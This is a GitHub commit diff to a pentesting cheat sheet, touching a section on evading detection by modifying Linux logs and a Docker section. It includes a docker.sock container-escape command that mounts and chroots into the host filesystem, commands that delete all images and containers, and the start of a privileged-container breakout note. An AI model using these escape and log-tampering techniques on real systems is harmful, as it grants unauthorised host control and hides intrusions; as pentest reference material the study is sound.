Update Cheat Sheet.md

This commit is contained in:
ARZ 2021-11-11 15:22:30 +05:00 committed by GitHub
parent 97acc84c5f
commit 852ae7f702
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -777,14 +777,14 @@ During a pentesting engagement, you will want to try to avoid detection from the
On Debian and Ubuntu, the majority of these are left within the "/var/log directory and often require administrative privileges to read and modify. Some log files of interest:
"/var/log/auth.log" (Attempted logins for SSH, changes too or logging in as system users:)
<img src="https://imgur.com/37aTxnI.png/>
<img src="https://imgur.com/37aTxnI.png"/>
"/var/log/syslog" (System events such as firewall alerts:)
<img src="https://imgur.com/k7scyUP.png/>
<img src="https://imgur.com/k7scyUP.png"/>
"/var/log/<service/"
For example, the access logs of apache2
/var/log/apache2/access.log
<img src="https://imgur.com/y8Rin3h.png/>
<img src="https://imgur.com/y8Rin3h.png"/>
# Docker
To see list of conatiner/images on a remote machine <br/>
@ -801,6 +801,13 @@ If docker.sock is on conatiner , upload static docker binary<br/>
`./docker -H unix:///var/run/docker.sock images`<br/>
`./docker -H unix:///var/run/docker.sock run -it -v /:/host/ wordpress chroot /host`<br/>
Remove docker images
`docker rmi $(docker images -q)` <br/>
Remove docker containers
`docker stop $(docker ps -a)`<br/>
## Docker Breakout/Exploits
* If we have a privilege docker and we can run command `fdisk -l` and view storage on the machine then we can mount the host file system <br/>